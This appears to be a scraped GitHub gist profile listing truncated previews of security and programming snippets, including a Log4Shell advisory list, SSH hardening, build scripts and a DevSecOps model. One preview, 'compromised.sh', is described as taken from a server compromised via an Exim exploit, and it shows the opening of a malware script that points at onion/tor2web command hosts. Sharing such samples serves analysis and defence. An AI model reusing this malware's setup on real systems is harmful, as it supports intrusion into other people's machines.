Skip to content

Instantly share code, notes, and snippets.

View jeremypruitt's full-sized avatar
:octocat:
@ Waabi.ai

Jeremy Pruitt jeremypruitt

:octocat:
@ Waabi.ai
View GitHub Profile
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active November 8, 2024 17:29
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
make clean
./Configure no-ssl2 no-ssl3 no-tls1 no-tls1_1 no-zlib no-comp no-dtls no-dtls1 no-dtlsi1_2 no-psk no-srp no-srtp no-capieng no-cms no-asm no-weak-ssl-ciphers no-dso no-gost no-hw-padlock no-rfc3779 no-ts no-aria no-bf no-blake2 no-camellia no-cast no-cmac no-des no-dsa enable-ec_nistp_64_gcc_128 no-idea no-md4 no-mdc2 no-ocb no-rc2 no-rc4 no-rmd16@ no-scrypt no-seed no-siphash no-sm2 no-sm3 no-sm4 no-whirlpool -02 -fno-strict-aliasing
@RuolinZheng08
RuolinZheng08 / backtracking_template.py
Last active September 9, 2024 08:42
[Algo] Backtracking Template & N-Queens Solution
def is_valid_state(state):
# check if it is a valid solution
return True
def get_candidates(state):
return []
def search(state, solutions):
if is_valid_state(state):
solutions.append(state.copy())
@makew0rld
makew0rld / go-build-all.sh
Last active April 26, 2024 09:51
Cross compile for all possible Golang targets. This script will always be updated, because it uses the `go` command to see what can be built.
#!/usr/bin/env bash
# Based on https://gist.github.com/eduncan911/68775dba9d3c028181e4
# but improved to use the `go` command so it never goes out of date.
type setopt >/dev/null 2>&1
contains() {
# Source: https://stackoverflow.com/a/8063398/7361270
[[ $1 =~ (^|[[:space:]])$2($|[[:space:]]) ]]
// create a bookmark and use this code as the URL, you can now toggle the css on/off
// thanks+credit: https://dev.to/gajus/my-favorite-css-hack-32g3
javascript: (function() {
var domStyle = document.createElement("style");
domStyle.append(
'* { color:#0f0!important;outline:solid #f00 1px!important; background-color: rgba(255,0,0,.2) !important; }\
* * { background-color: rgba(0,255,0,.2) !important; }\
* * * { background-color: rgba(0,0,255,.2) !important; }\
* * * * { background-color: rgba(255,0,255,.2) !important; }\
* * * * * { background-color: rgba(0,255,255,.2) !important; }\
@apolloclark
apolloclark / devsecops_maturity_model.md
Last active October 8, 2024 01:35
DevSecOps Maturity Model

DevSecOps Maturity Model

DevSecOps has finally become popular within the wider IT industry in 2019. I started as a web developer in 2001, learned about testing automation, system deployment automation, and "infrastructure as code" in 2012, when DevOps was becoming a popular term. DevOps became common after the release of The Phoenix Project in Jan 2013. It has taken 7+ years for security to become integrated within the DevOps methodology. The following is a list of concepts I go through with project owners, project managers, operations, developers, and security teams, to help establish how mature their DevOps and security automation is, and to help them increase that maturity over time. This model is based on experience consulting with a variety of US Financial, Healthcare, and Department of Defense, organizations, and combines:

@worldwise001
worldwise001 / compromised.sh
Created June 14, 2019 06:40
extracted from a box popped by exim rce
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
@lizthegrey
lizthegrey / attributes.rb
Last active September 24, 2024 14:33
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
Video: https://youtu.be/2OWtEymBQfA
1. Quick Assessment - Running Nessus and NMAP
-- Nessus primarily to see if it detects open KSQL (Spoiler: It doesn't)
-- NMAP to identify whatports are open
2. Seeing what is possible from an exposed KSQL/Kafka Port
-- Download and extract: https://github.com/Cyb3rWard0g/HELK/wiki/Deploy-KSQL-CLI-Locally
-- ./ksql http://172.16.10.10:8088
-- Run the commands:
@miketweaver
miketweaver / noFriends.py
Last active March 26, 2024 16:24
Solve the Serial communication for the BsidesSLC 2019 Badge
#!/usr/bin/python
#License
#Copyright 2019 Mike Weaver
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WIT